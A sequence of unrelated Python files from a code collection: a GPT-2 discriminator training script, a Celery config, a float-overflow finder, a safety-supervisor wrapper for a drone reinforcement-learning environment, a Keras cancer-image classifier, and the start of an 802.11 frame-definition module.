class Discriminator(torch.nn.Module):
def __init__(self):
super(Discriminator, self).__init__()
self.classifierhead = ClassificationHead()
self.model = model
self.spltoken = Variable(torch.randn(1, 1, 1024).type(torch.FloatTensor), requires_grad=True)
self.spltoken = self.spltoken.repeat(10, 1, 1)
self.spltoken = self.spltoken.cuda()
def train(self):
for param in self.model.parameters():
param.requires_grad = False
pass
def forward(self, x):
x = model.forward_embed(x)
x = torch.cat((x, self.spltoken), dim=1)
_, x = model.forward_transformer_embed(x, add_one=True)
x = self.classifierhead(x[-1][:, -1, :])
x = F.log_softmax(x, dim=-1)
return x
class Discriminator2(torch.nn.Module):
def __init__(self, class_size=5, embed_size=1024):
super(Discriminator2, self).__init__()
self.classifierhead = ClassificationHead(class_size=class_size, embed_size=embed_size)
self.model = model
self.embed_size = embed_size
def get_classifier(self):
return self.classifierhead
def train_custom(self):
for param in self.model.parameters():
param.requires_grad = False
pass
self.classifierhead.train()
def forward(self, x):
x = model.forward_embed(x)
hidden, x = model.forward_transformer_embed(x)
x = torch.sum(hidden, dim=1)
x = self.classifierhead(x)
x = F.log_softmax(x, dim=-1)
return x
class Discriminator2mean(torch.nn.Module):
def __init__(self, class_size=5, embed_size=1024):
super(Discriminator2mean, self).__init__()
self.classifierhead = ClassificationHead(class_size=class_size, embed_size=embed_size)
self.model = model
self.embed_size = embed_size
def get_classifier(self):
return self.classifierhead
def train_custom(self):
for param in self.model.parameters():
param.requires_grad = False
pass
self.classifierhead.train()
def forward(self, x):
mask_src = 1 - x.eq(0).unsqueeze(1).type(torch.FloatTensor).cuda().detach()
mask_src = mask_src.repeat(1, self.embed_size, 1)
x = model.forward_embed(x)
hidden, x = model.forward_transformer_embed(x)
# Hidden has shape batch_size x length x embed-dim
hidden = hidden.permute(0, 2, 1)
_, _, batch_length = hidden.shape
hidden = hidden * mask_src # / torch.sum(mask_src, dim=-1).unsqueeze(2).repeat(1, 1, batch_length)
#
hidden = hidden.permute(0, 2, 1)
x = torch.sum(hidden, dim=1)/(torch.sum(mask_src, dim=-1).detach() + 1e-10)
x = self.classifierhead(x)
x = F.log_softmax(x, dim=-1)
return x
class Dataset(data.Dataset):
def __init__(self, X, y):
"""Reads source and target sequences from txt files."""
self.X = X
self.y = y
def __len__(self):
return len(self.X)
def __getitem__(self, index):
"""Returns one data pair (source and target)."""
d = {}
d['X'] = self.X[index]
d['y'] = self.y[index]
return d
def collate_fn(data):
def merge(sequences):
lengths = [len(seq) for seq in sequences]
padded_seqs = torch.zeros(len(sequences), max(lengths)).long().cuda() # padding index 0
for i, seq in enumerate(sequences):
end = lengths[i]
padded_seqs[i, :end] = seq[:end]
return padded_seqs, lengths
data.sort(key=lambda x: len(x["X"]), reverse=True) # sort by source seq
item_info = {}
for key in data[0].keys():
item_info[key] = [d[key] for d in data]
# input
x_batch, _ = merge(item_info['X'])
y_batch = item_info['y']
return x_batch, torch.tensor(y_batch, device='cuda', dtype=torch.long)
def train_epoch(data_loader, discriminator, device='cuda', args=None, epoch=1):
optimizer = optim.Adam(discriminator.parameters(), lr=0.0001)
discriminator.train_custom()
for batch_idx, (data, target) in enumerate(data_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = discriminator(data)
loss = F.nll_loss(output, target)
loss.backward(retain_graph=True)
optimizer.step()
if batch_idx % args.log_interval == 0:
print('Relu Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(data_loader.dataset),
100. * batch_idx / len(data_loader), loss.item()))
def test_epoch(data_loader, discriminator, device='cuda', args=None):
discriminator.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in data_loader:
data, target = data.to(device), target.to(device)
output = discriminator(data)
test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(data_loader.dataset)
print('\nRelu Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(data_loader.dataset),
100. * correct / len(data_loader.dataset)))
def main():
parser = argparse.ArgumentParser(description='Train a discriminator on top of GPT-2 representations')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='Number of training epochs')
parser.add_argument('--save-model', action='store_true', help='whether to save the model')
    parser.add_argument('--dataset-label', type=str, default='SST', choices=('SST', 'clickbait', 'toxic'))
args = parser.parse_args()
batch_size = args.batch_size
device = 'cuda'
# load sst
if args.dataset_label == 'SST':
text = torchtext_data.Field()
label = torchtext_data.Field(sequential=False)
train_data, val_data, test_data = datasets.SST.splits(text, label, fine_grained=True, train_subtrees=True,
# filter_pred=lambda ex: ex.label != 'neutral'
)
x = []
y = []
d = {"positive": 0, "negative": 1, "very positive": 2, "very negative": 3, "neutral": 4}
for i in range(len(train_data)):
seq = TreebankWordDetokenizer().detokenize(vars(train_data[i])["text"])
seq = tokenizer.encode(seq)
seq = torch.tensor(seq, device=device, dtype=torch.long)
x.append(seq)
y.append(d[vars(train_data[i])["label"]])
dataset = Dataset(x, y)
test_x = []
test_y = []
for i in range(len(test_data)):
seq = TreebankWordDetokenizer().detokenize(vars(test_data[i])["text"])
seq = tokenizer.encode(seq)
seq = torch.tensor([50256] + seq, device=device, dtype=torch.long)
test_x.append(seq)
test_y.append(d[vars(test_data[i])["label"]])
test_dataset = Dataset(test_x, test_y)
discriminator = Discriminator2mean(class_size=5).to(device)
elif args.dataset_label == 'clickbait':
# data = pickle.load(open("/home/gilocal/lab/exp/language/datasets/clickbait/clickbait.p", "r"))
with open("datasets/clickbait/clickbait_train_prefix.txt") as f:
data = []
for d in f:
try:
data.append(eval(d))
except:
continue
x = []
y = []
for d in data:
try:
# seq = tokenizer.encode("Apple's iOS 9 'App thinning' feature will give your phone's storage a boost")
try:
seq = tokenizer.encode(d["text"])
except:
continue
seq = torch.tensor([50256] + seq, device=device, dtype=torch.long)
x.append(seq)
y.append(d['label'])
except:
pass
dataset = Dataset(x, y)
train_size = int(0.9 * len(dataset))
test_size = len(dataset) - train_size
dataset, test_dataset = torch.utils.data.random_split(dataset, [train_size, test_size])
discriminator = Discriminator2mean(class_size=2).to(device)
elif args.dataset_label == 'toxic':
# data = pickle.load(open("/home/gilocal/lab/exp/language/datasets/clickbait/clickbait.p", "r"))
with open("datasets/toxic/toxic_train.txt") as f:
data = []
for d in f:
data.append(eval(d))
x = []
y = []
for d in data:
try:
# seq = tokenizer.encode("Apple's iOS 9 'App thinning' feature will give your phone's storage a boost")
seq = tokenizer.encode(d["text"])
device = 'cuda'
if(len(seq)<100):
seq = torch.tensor([50256] + seq, device=device, dtype=torch.long)
else:
continue
x.append(seq)
y.append(int(np.sum(d['label'])>0))
except:
pass
dataset = Dataset(x, y)
print(dataset)
print(len(dataset))
train_size = int(0.9 * len(dataset))
test_size = len(dataset) - train_size
dataset, test_dataset = torch.utils.data.random_split(dataset, [train_size, test_size])
discriminator = Discriminator2mean(class_size=2).to(device)
data_loader = torch.utils.data.DataLoader(dataset=dataset,
batch_size=batch_size,
shuffle=True, collate_fn=collate_fn)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
batch_size=batch_size, collate_fn=collate_fn)
for epoch in range(args.epochs):
train_epoch(discriminator=discriminator, data_loader=data_loader, args=args, device=device, epoch=epoch)
test_epoch(data_loader=test_loader, discriminator=discriminator, args=args)
seq = tokenizer.encode("This is incredible! I love it, this is the best chicken I have ever had.")
seq = torch.tensor([seq], device=device, dtype=torch.long)
print(discriminator(seq))
if (args.save_model):
torch.save(discriminator.state_dict(),
"discrim_models/{}_mean_lin_discriminator_{}.pt".format(args.dataset_label, epoch))
torch.save(discriminator.get_classifier().state_dict(),
"discrim_models/{}_classifierhead.pt".format(args.dataset_label))
seq = tokenizer.encode("This is incredible! I love it, this is the best chicken I have ever had.")
seq = torch.tensor([seq], device=device, dtype=torch.long)
print(discriminator(seq))
if __name__ == '__main__':
main()
|
py | 1a3f86d8374a1c6286d9de192e904277bb3a7615 | import os
broker_url = os.environ.get('BROKER_URL')
broker_use_ssl = os.environ.get('BROKER_USE_SSL', False)
worker_concurrency = 1
worker_prefetch_multiplier = 1
task_acks_late = True
|
py | 1a3f87fb8c9722233ddc9491aaca58044938ae02 | """Compute the largest double precision number that doesn't cause
exp/cosh/sinh to overflow.
"""
import numpy as np
np.seterr(all='ignore')
def find_overflow(f, a, b):
# Start with a binary search
while True:
mid = 0.5*(a + b)
if f(mid) == np.inf:
b = mid
else:
a = mid
if abs(b - a) < 1e-12:
break
# Polish with a brute force search
while True:
b = np.nextafter(a, np.inf)
        res = f(b)  # evaluate the function under test, not exp unconditionally
if res == np.inf:
return a
else:
a = b
def main():
a = find_overflow(np.exp, 709.7, 709.9)
print("a = {:.20g}, np.exp(a) = {}".format(a, np.exp(a)))
a = find_overflow(np.cosh, 710, 711)
print("a = {:.20g}, np.cosh(a) = {}".format(a, np.cosh(a)))
a = find_overflow(np.sinh, 710, 711)
print("a = {:.20g}, np.sinh(a) = {}".format(a, np.sinh(a)))
if __name__ == '__main__':
main()
|
py | 1a3f889f231cdd1f100c3c394cdf7ea5b3d1c5bc | # load extern modules
import gym
import csv
import time
import numpy as np
from stable_baselines.bench import Monitor
from supervisors.utils import distance_from_obstacles
from env.utils import obs_lidar_pseudo
import threading
from supervisors.cbf import initialize_gp_dynamics, predict_successor_state_gp, initialize_svm_prediction
from supervisors.cbf import initialize_svm_prediction_gp
from operator import itemgetter
from skopt.space import Space
from skopt.sampler import Grid
# from qpsolvers import solve_qp
class Supervisor(Monitor):
"""
    A monitor wrapper for Gym environments to save collision events
Parameters:
env (gym.Env): The environment
filename (Optional[str]): the location to save a log file, can be None for no log
"""
def __init__(self,
env: gym.Env,
filename: str,
safety_distance: float or None,
visibility: float,
safe_info: bool,
safe_states: bool,
supervisor: str,
coordinates_static_obstacles: np.array,
lidar_num_bins: int,
which_static: int,
record_svm_gp: bool,
cbf_quadratic: bool,
cbf_learn_online: bool,
rewards: np.array or None,
num_prior_data_cbf: str or None,
search_space: str or None,
scale_reward: bool):
super(Supervisor, self).__init__(env=env, filename=filename)
self.safety_distance = safety_distance
self.visibility = visibility
self.supervisor = supervisor
self.lidar_num_bins = lidar_num_bins
self.Supervised = 0
self.Intervention = 0
self.SafelyDone = 0
self.scale_reward = scale_reward
self.record_svm_gp = record_svm_gp
self.Crashed = 0
self.last_teacher_crash = 0
self.timeOut = 0
self.which_static = which_static
self.safe_states = safe_states
self.total_distance = 0
if supervisor == 'cbf-gp-logical' or supervisor == 'cbf-gp-svm':
if num_prior_data_cbf is None:
num_prior_data_cbf = '2k'
self.gp = initialize_gp_dynamics('2k')
if supervisor == 'cbf-gp-svm':
if num_prior_data_cbf is None:
num_prior_data_cbf = 100000
self.svm = initialize_svm_prediction_gp(num_prior_data=num_prior_data_cbf)
self.unsafe_threshold = 0.5
search_space = 'grid'
if supervisor == 'cbf-svm':
if num_prior_data_cbf is None:
num_prior_data_cbf = 2000
self.svm = initialize_svm_prediction(num_prior_data=num_prior_data_cbf)
self.unsafe_threshold = 0.6
if supervisor == 'cbf-gp-logical':
self.unsafe_threshold = 0.85
search_space = 'random'
self.cbf_quadratic = cbf_quadratic
if search_space == 'grid':
space = Space([(-1., 1.), (-1., 1.)])
grid = Grid(border="include", use_full_layout=False)
action_manipulated = grid.generate(space.dimensions, 160)
action_manipulated = np.array(action_manipulated)
action_manipulated2 = \
np.append(action_manipulated[(action_manipulated[:, 0] < -0.3) * (action_manipulated[:, 1] < -0.3), :],
action_manipulated[(action_manipulated[:, 0] > 0.3) * (action_manipulated[:, 1] > 0.3), :],
axis=0)
action_manipulated2 = \
np.append(action_manipulated2,
action_manipulated[(action_manipulated[:, 0] > 0.3) * (action_manipulated[:, 1] < -0.3), :],
axis=0)
action_manipulated2 = \
np.append(action_manipulated2,
action_manipulated[(action_manipulated[:, 0] < -0.3) * (action_manipulated[:, 1] > 0.3), :],
axis=0)
self.action_manipulated = action_manipulated2
if search_space == 'random':
self.action_manipulated = np.array([[-0.1, 0],
[0.1, 0],
[0, 0.1],
[0, -0.1],
[-0.25, 0],
[0.25, 0],
[0, 0.25],
[0, -0.25],
[-0.1, 0.1],
[0.1, 0.1],
[-0.1, -0.1],
[0.1, -0.1],
[-0.25, 0.25],
[0.25, 0.25],
[-0.25, -0.25],
[0.25, -0.25], ###############
[0.1, 0.05],
[0.05, 0.1],
[0.05, -0.1],
[-0.25, 0.1],
[0.25, 0.8],
[0.6, 0.25],
[0.3, -0.25],
[-0.1, 0.7],
[0.9, 0.1],
[-0.1, -1],
[1, -0.1],
[-0.2, 0.75],
[0.5, 0.5],
[-0.5, -0.5],
[0.75, 0],
[0.15, 0.05],
[0.6, 0.1],
[0.4, -0.1],
[-0.25, 0.15],
[0.25, 0.9],
[-0.35, 0.25],
[0.5, -0.25],
[-0.19, 0.19],
[1, 1],
[-1, -1],
[0, 1],
[-1, 0],
[0.2, 0.75],
[-0.8, 0],
[0, -0.58]])
self.cbf_learn_online = cbf_learn_online
self.TotalCollisions = []
self.filename = filename
self.observation_storage = []
self.safe_info = safe_info
self.csv_writer_lock = threading.Lock()
self.coordinates_static_obstacles = coordinates_static_obstacles
self.rewards = rewards
# reward shaping
if self.rewards is not None:
self.reward_reached_target = self.rewards[0]
self.reward_distance = self.rewards[1]
self.reward_crashed = self.rewards[2]
if self.supervisor == "logical":
self.reward_logical = self.rewards[3]
if self.supervisor == "cbf-gp-logical" or self.supervisor == "cbf-svm" or self.supervisor == "cbf-gp-svm":
self.reward_cbf = self.rewards[3]
# default reward settings
if self.rewards is None:
self.reward_reached_target = 150
self.reward_distance = 1.5
self.reward_crashed = 150
self.reward_cbf = 0.5
self.reward_logical = 100
# add extra static obstacles as boundary of the garden
self.extra_obstacles = np.array([[-2.5, -.15],
[-2.5, -.35],
[-2.5, -.55],
[-2.5, -.75],
[-2.5, -.95],
[-2.5, -1.15],
[-2.5, -1.35],
[-2.5, -1.55],
[-2.5, -1.75],
[-2.5, -1.95],
[-2.5, -2.15],
[-2.5, -2.35],
[-2.5, -2.55],
[-2.5, -2.75],
[-2.5, -2.95],
[-2.5, -3.15],
[-2.5, -3.35],
[2.55, -.25],
[2.55, -.35],
[2.55, -.55],
[2.55, -.75],
[2.55, -.95],
[2.55, -1.15],
[2.55, -1.35],
[2.55, -1.55],
[2.55, -1.75],
[2.55, -1.95],
[2.55, -2.15],
[2.55, -2.35],
[2.55, -2.55],
[2.55, -2.75],
[2.55, -2.95],
[2.55, -3.15],
[2.55, -3.35],
[-2.50, -0.15],
[-2.30, -0.15],
[-2.10, -0.15],
[-1.90, -0.15],
[-1.70, -0.15],
[-1.50, -0.15],
[-1.30, -0.15],
[-1.10, -0.15],
[-.90, -0.15],
[-.70, -0.15],
[-.5, -0.15],
[-.3, -0.15],
[-.1, -0.15],
[0.7, -0.15],
[0.9, -0.15],
[1.1, -0.15],
[1.3, -0.15],
[1.5, -0.15],
[1.7, -0.15],
[1.9, -0.15],
[2.1, -0.15],
[2.3, -0.15],
[2.5, -0.15],
[-2.40, -3.4],
[-2.20, -3.4],
[-2.00, -3.4],
[-1.90, -3.4],
[-1.70, -3.4],
[-1.50, -3.4],
[-1.30, -3.4],
[-1.10, -3.4],
[-.90, -3.4],
[-.70, -3.4],
[-.50, -3.4],
[-.3, -3.4],
[-.1, -3.4],
[0.1, -3.4],
[0.3, -3.4],
[0.5, -3.4],
[0.7, -3.4],
[0.9, -3.4],
[1.1, -3.4],
[1.3, -3.4],
[1.5, -3.4],
[1.7, -3.4],
[1.9, -3.4],
[2.1, -3.4],
[2.3, -3.4],
[2.5, -3.4],
])
# add extra obstacles as tress in the middle of the garden
self.extra_obstacles = np.concatenate((self.extra_obstacles, self.coordinates_static_obstacles))
def step(self, action):
"""
Get information for the next RL step
Parameters:
action (float, float): Action vector (speed)
Returns:
[float]: Observation vector
float: reward value
observation, reward, done, info
"""
reward = 0
# check if env needs reset
if self.needs_reset:
raise RuntimeError("Tried to step environment that needs reset")
# pass proposed action to the CBF (if CBF is active) and return the manipulated or the proposed action
if self.supervisor == 'cbf-gp-logical' or self.supervisor == 'cbf-svm' or self.supervisor == 'cbf-gp-svm':
index = int(len(self.observation_storage) - 1)
old_observation = self.observation_storage[index]
if self.cbf_learn_online is True:
if len(self.observation_storage) > 2:
state_x = self.observation_storage[index - 1]
state_x = state_x[0:self.lidar_num_bins]
state_x = np.asarray(state_x)
action_x = self.observation_storage[index]
action_x = action_x[28:30]
action_x = np.asarray(action_x)
state_action_x = np.append(state_x, action_x)
state_action_x = state_action_x.reshape(1, -1)
state_y = self.observation_storage[index]
state_y = state_y[26]
if state_y > 0:
state_y = int(1)
else:
state_y = int(-1)
state_y = np.asarray(state_y)
state_y = state_y.reshape(1, -1)
self.svm.fit(state_action_x, state_y)
change_proposed_action = False
if self.supervisor == 'cbf-gp-svm' or self.supervisor == 'cbf-gp-logical':
successor_state_worst = predict_successor_state_gp(self.gp,
observation=old_observation[0:self.lidar_num_bins],
action=action)
if self.supervisor == 'cbf-gp-svm':
successor_state_worst = np.sort(successor_state_worst)
successor_state_worst = successor_state_worst.reshape(1, -1)
probability = self.svm.predict_proba(successor_state_worst)
unsafe_probability = probability[0, 1]
# print(unsafe_probability)
if unsafe_probability > self.unsafe_threshold:
change_proposed_action = True
if self.supervisor == 'cbf-gp-logical':
change_proposed_action = max(successor_state_worst[0]) > self.unsafe_threshold
if self.supervisor == 'cbf-svm':
# hier nur svm predicten
state_action = np.concatenate((old_observation[0:self.lidar_num_bins], action), axis=0)
state_action = state_action.reshape(1, -1)
probability = self.svm.predict_proba(state_action)
unsafe = probability[0, 1]
if unsafe > self.unsafe_threshold:
change_proposed_action = True
if change_proposed_action:
if self.supervisor == 'cbf-gp-logical' or self.supervisor == 'cbf-gp-svm':
successor_state_worst_manipulated = []
manipulated = predict_successor_state_gp(self.gp,
observation=old_observation[0:self.lidar_num_bins],
action=self.action_manipulated)
if self.supervisor == 'cbf-gp-logical':
successor_state_worst_manipulated = np.amax(manipulated, axis=1)
if self.supervisor == 'cbf-gp-svm':
manipulated = np.sort(manipulated, axis=1)
probability = self.svm.predict_proba(manipulated)
successor_state_worst_manipulated = probability[:, 1]
if not self.cbf_quadratic:
index = np.argmin(successor_state_worst_manipulated)
distance_org = np.sqrt((self.action_manipulated[index, 0] - action[0]) ** 2 +
(self.action_manipulated[index, 1] - action[1]) ** 2)
self.total_distance += distance_org
action = self.action_manipulated[index]
if self.scale_reward:
reward -= self.reward_cbf * (distance_org / 2.8)
self.total_distance += distance_org
if self.cbf_quadratic:
if int(sum(successor_state_worst_manipulated < self.unsafe_threshold)) > 0.1:
safety_actions = self.action_manipulated[successor_state_worst_manipulated < self.unsafe_threshold]
else:
safety_actions = self.action_manipulated
distance_org = np.sqrt((safety_actions[:, 0] - action[0]) ** 2 +
(safety_actions[:, 1] - action[1]) ** 2)
index = min(enumerate(distance_org), key=itemgetter(1))[0]
action = safety_actions[index]
if self.scale_reward:
reward -= self.reward_cbf * (distance_org[index] / 2.8)
self.total_distance += distance_org[index]
#if self.supervisor == 'cbf-svm':
# successor_state_unsafe_prob_manipulated = []
# for j in range(0, len(self.action_manipulated)):
# state_action = np.concatenate((old_observation[0:self.lidar_num_bins],
# self.action_manipulated[j]), axis=0)
# state_action = state_action.reshape(1, -1)
# probability = self.svm.predict_proba(state_action)
# unsafe = probability[0, 1]
# successor_state_unsafe_prob_manipulated.append(unsafe)
# index = np.argmin(successor_state_unsafe_prob_manipulated)
# action = self.action_manipulated[index]
self.last_teacher_crash = 1
self.Intervention += 1
self.Supervised = 1
if not self.scale_reward:
reward -= self.reward_cbf
# step env
observation, reward_unity, done, info = self.env.step(action)
# manipulate reward with distance to target. maximum distance is ~5.
reward -= (observation[0] / 5) * self.reward_distance
# save org ibm obs
org_observation = observation
# check if safely done
if done:
self.SafelyDone += 1
reward += self.reward_reached_target
# compute distances to obstacles
distance = distance_from_obstacles(self, observation)
# check if drone crashed
if not done:
if np.min(distance) <= .2:
self.Crashed += 1
reward -= self.reward_crashed
done = True
# check if logical supervisor is active
if not done:
if self.supervisor == 'logical':
if not self.record_svm_gp:
if np.min(distance) <= (self.safety_distance + np.random.rand(1) / 25):
self.Supervised += 1
self.Intervention += 1
done = True
reward -= self.reward_logical
# the following is used when recording data
if self.record_svm_gp:
if np.min(distance) <= 0.29 + np.random.rand(1) / 25:
self.Supervised += 1
self.Intervention += 1
done = True
reward -= self.reward_logical
else:
if np.min(distance) <= 0.35 + np.random.rand(1) / 25:
self.Supervised += 1
# append reward
self.rewards.append(reward)
        # time out: end the episode after 120 steps if it has not terminated otherwise
if len(self.rewards) == 120:
if not done:
done = True
self.timeOut += 1
# transform observation to lidar like observation
observation = obs_lidar_pseudo(self, observation, lidar_num_bins=self.lidar_num_bins, lidar_max_dist=None,
lidar_alias=True, lidar_exp_gain=1.0, distance=distance)
# append supervisor and save current observation to the storage
# first self.lidar_num_bins entries of the observation storage correspond to the lidar
# the next entry is the supervised indicator
# the next entry is the done indicator
# the last 23 entries correspond to the original oracle observation by IBM
observation_storage = np.append(observation, self.Supervised)
observation_storage = np.append(observation_storage, self.which_static)
observation_storage = np.append(observation_storage, self.Intervention)
observation_storage = np.append(observation_storage, self.Crashed)
observation_storage = np.append(observation_storage, done)
observation_storage = np.append(observation_storage, action)
observation_storage = np.append(observation_storage, org_observation)
self.observation_storage.append(observation_storage)
# append the observations of time step t-1 and t-2 to the observation of time step t
# when resetting the env the observations of time step t-1 and t-2 are np.zeros()
# in time step 1 the observation of time step t-2 are np.zeros()
if len(self.rewards) == 1:
observation = np.concatenate((observation, self.observation_storage[0][0:(self.lidar_num_bins + 8)]),
axis=0)
observation_dummy = np.zeros(self.lidar_num_bins + 8)
observation = np.concatenate((observation, observation_dummy), axis=0)
if len(self.rewards) > 1:
observation = np.concatenate((observation, self.observation_storage[len(self.rewards) - 2
][0:(self.lidar_num_bins + 8)]), axis=0)
observation = np.concatenate((observation, self.observation_storage[len(self.rewards) - 1
][0:(self.lidar_num_bins + 8)]), axis=0)
if done:
self.needs_reset = True
ep_rew = sum(self.rewards)
eplen = len(self.rewards)
            if self.Crashed > 0 and self.last_teacher_crash == 1:
teacher_failed = 1
else:
teacher_failed = 0
ep_info = [round(ep_rew, 6), eplen, self.Crashed, self.Supervised, self.Intervention, self.SafelyDone,
self.timeOut, round(time.time(), 6), teacher_failed, self.total_distance]
self.episode_rewards.append(ep_rew)
self.episode_lengths.append(eplen)
self.episode_times.append(time.time() - self.t_start)
info['episode'] = ep_info
if self.safe_states: # and self.Crashed > 0:####################################################
with open(self.filename + 'states.csv', 'a', newline='') as f:
writer = csv.writer(f)
with self.csv_writer_lock:
writer.writerows(self.observation_storage)
if self.safe_info:
with open(self.filename + 'monitor.csv', 'a', newline='') as f:
writer = csv.writer(f)
with self.csv_writer_lock:
writer.writerow(ep_info)
self.TotalCollisions.append(self.Supervised)
self.Supervised = 0
self.SafelyDone = 0
self.Intervention = 0
self.Crashed = 0
self.total_distance = 0
self.timeOut = 0
self.rewards = []
self.observation_storage = []
if not done:
if self.supervisor == 'logical' and self.record_svm_gp:
self.Supervised = 0
self.last_teacher_crash = 0
self.total_steps += 1
return observation, reward, done, info
def reset(self, **kwargs):
observation = self.env.reset(**kwargs)
org_observation = observation
distance = distance_from_obstacles(self, observation)
while np.min(distance) < .35:
observation = self.env.reset(**kwargs)
org_observation = observation
distance = distance_from_obstacles(self, observation)
if np.min(distance) < .35:
self.needs_reset = True
if np.min(distance) >= .35:
self.needs_reset = False
self.rewards = []
observation = obs_lidar_pseudo(self, observation, lidar_num_bins=self.lidar_num_bins, lidar_max_dist=None,
lidar_alias=True, lidar_exp_gain=1.0, distance=distance)
# append supervisor and save current observation to the storage
supervised = False
observation_storage = np.append(observation, supervised)
observation_storage = np.append(observation_storage, self.which_static)
intervention = np.array([0])
observation_storage = np.append(observation_storage, intervention)
crash_dummy = np.array([0])
observation_storage = np.append(observation_storage, crash_dummy)
done = False
observation_storage = np.append(observation_storage, done)
action_dummy = np.array([0, 0])
observation_storage = np.append(observation_storage, action_dummy)
observation_storage = np.append(observation_storage, org_observation)
self.observation_storage.append(observation_storage)
observation_dummy = np.zeros(self.lidar_num_bins + 8)
observation = np.concatenate((observation, observation_dummy), axis=0)
observation = np.concatenate((observation, observation_dummy), axis=0)
return observation
|
py | 1a3f89376a81097616e8d4ff862c491426e06045 |
import matplotlib
matplotlib.use("Agg")
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adagrad
from keras.utils import np_utils
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from net import CancerNet  # assumes the local net module defines the CancerNet architecture
from configuration import config
from imutils import paths
import matplotlib.pyplot as plt
import numpy as np
import argparse
import os
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--plot", type=str, default="plot.png",
help="path to output loss/accuracy plot")
args = vars(ap.parse_args())
NUM_EPOCHS = 20
INIT_LR = 1e-2
BS = 64
trainPaths = list(paths.list_images(config.TRAIN_PATH))
totalTrain = len(trainPaths)
totalVal = len(list(paths.list_images(config.VAL_PATH)))
totalTest = len(list(paths.list_images(config.TEST_PATH)))
trainLabels = [int(p.split(os.path.sep)[-2]) for p in trainPaths]
trainLabels = np_utils.to_categorical(trainLabels)
classTotals = trainLabels.sum(axis=0)
classWeight = classTotals.max() / classTotals
trainAug = ImageDataGenerator(
rescale=1 / 255.0,
rotation_range=20,
zoom_range=0.05,
width_shift_range=0.1,
height_shift_range=0.1,
shear_range=0.05,
horizontal_flip=True,
vertical_flip=True,
fill_mode="nearest")
valAug = ImageDataGenerator(rescale=1 / 255.0)
trainGen = trainAug.flow_from_directory(
config.TRAIN_PATH,
class_mode="categorical",
target_size=(48, 48),
color_mode="rgb",
shuffle=True,
batch_size=BS)
valGen = valAug.flow_from_directory(
config.VAL_PATH,
class_mode="categorical",
target_size=(48, 48),
color_mode="rgb",
shuffle=False,
batch_size=BS)
testGen = valAug.flow_from_directory(
config.TEST_PATH,
class_mode="categorical",
target_size=(48, 48),
color_mode="rgb",
shuffle=False,
batch_size=BS)
model = CancerNet.build(width=48, height=48, depth=3,
classes=2)
opt = Adagrad(lr=INIT_LR, decay=INIT_LR / NUM_EPOCHS)
model.compile(loss="binary_crossentropy", optimizer=opt,
metrics=["accuracy"])
H = model.fit_generator(
trainGen,
steps_per_epoch=totalTrain // BS,
validation_data=valGen,
validation_steps=totalVal // BS,
class_weight=classWeight,
epochs=NUM_EPOCHS)
print("[INFO] evaluating network...")
testGen.reset()
predIdxs = model.predict_generator(testGen,
steps=(totalTest // BS) + 1)
predIdxs = np.argmax(predIdxs, axis=1)
print(classification_report(testGen.classes, predIdxs,
target_names=testGen.class_indices.keys()))
cm = confusion_matrix(testGen.classes, predIdxs)
total = sum(sum(cm))
acc = (cm[0, 0] + cm[1, 1]) / total
sensitivity = cm[0, 0] / (cm[0, 0] + cm[0, 1])
specificity = cm[1, 1] / (cm[1, 0] + cm[1, 1])
print(cm)
print("acc: {:.4f}".format(acc))
print("sensitivity: {:.4f}".format(sensitivity))
print("specificity: {:.4f}".format(specificity))
model.save('cancer.model')
N = NUM_EPOCHS
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, N), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, N), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, N), H.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, N), H.history["val_accuracy"], label="val_acc")
plt.title("Training Loss and Accuracy on Dataset")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="lower left")
plt.savefig(args["plot"])
|
py | 1a3f89539450fe4845ccff128b18bf331c7d1368 | #!/usr/bin/python
"""
Wi-Fi protocol definitions
currently supported packet types are listed below
Management
-Probe Request
-Probe Response
-Beacon
Control
-RTS
-CTS
-Block Acknowledgement
Data
-QoS Data
Radiotap headers are also supported; field definitions:
http://www.radiotap.org/defined-fields
"""
import ctypes
import struct
import logging
import operator
import collections
# wlan.fc.type
_CATEGORIES_ = {0: 'management', 1: 'control', 2: 'data'}
_SUBTYPES_ = {}
# wlan.fc.type_subtype
_SUBTYPES_[0] = {
0: 'Association Request',
1: 'Association Response',
2: 'Reassociation Request',
3: 'Reassociation Response',
4: 'Probe Request',
5: 'Probe Response',
8: 'Beacon',
9: 'ATIM',
10: 'Disassociation',
11: 'Authentication',
12: 'Deauthentication',
13: 'Action',
14: 'Action No ACK'
}
_SUBTYPES_[1] = {
5: 'VHT NDP Announcement',
7: 'Control Wrapper',
8: 'BAR',
9: 'BACK',
10: 'PS-POLL',
11: 'RTS',
12: 'CTS',
13: 'ACK',
14: 'CF-end',
15: 'CF-end + CF-ack'
}
_SUBTYPES_[2] = {
0: 'Data',
1: 'Data + CF-ack',
2: 'Data + CF-poll',
3: 'Data+CF-ack+CF-poll',
4: 'Null',
5: 'CF-ack',
6: 'CF-poll',
7: 'CF-ack+CF-poll',
8: 'QoS data',
9: 'QoS data + CF-ack',
10: 'QoS data + CF-poll',
11: 'QoS data + CF-ack + CF-poll',
12: 'QoS Null',
13: 'Reserved',
14: 'Qos + CF-poll(no data)',
15: 'Qos + CF-ack(no data)'
}
# wlan_mgt.tag
MNGMT_TAGS = {
0: "TAG_SSID",
1: "TAG_SUPP_RATES",
2: "TAG_FH_PARAMETER",
3: "TAG_DS_PARAMETER",
4: "TAG_CF_PARAMETER",
5: "TAG_TIM",
